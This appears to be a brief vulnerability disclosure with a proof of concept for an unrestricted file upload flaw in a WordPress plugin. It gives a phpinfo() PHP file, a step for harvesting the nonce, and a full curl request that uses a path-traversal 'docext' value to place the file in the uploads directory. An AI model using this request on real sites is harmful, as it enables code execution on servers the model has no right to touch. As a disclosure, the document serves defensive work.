The plugin does not filter file extensions when letting users upload files on the server, which may lead to malicious code being uploaded.
1) Create a file named exploit.php, which contains: <?php phpinfo();
2) Find the upf_ajax_nonce on the site's front page.
2) Run the following cURL request,
curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -b 'YOUR COOKIES' -F '[email protected]' -F 'docext=/../../exploit.php' -F 'doc_type=doc/pdf' -F 'action=upload_doc_callback' -F 'upf_nonce=YOUR NONCE'
# You can find the uploaded PHP file at: https://target/blog/wp-content/uploads/exploit.php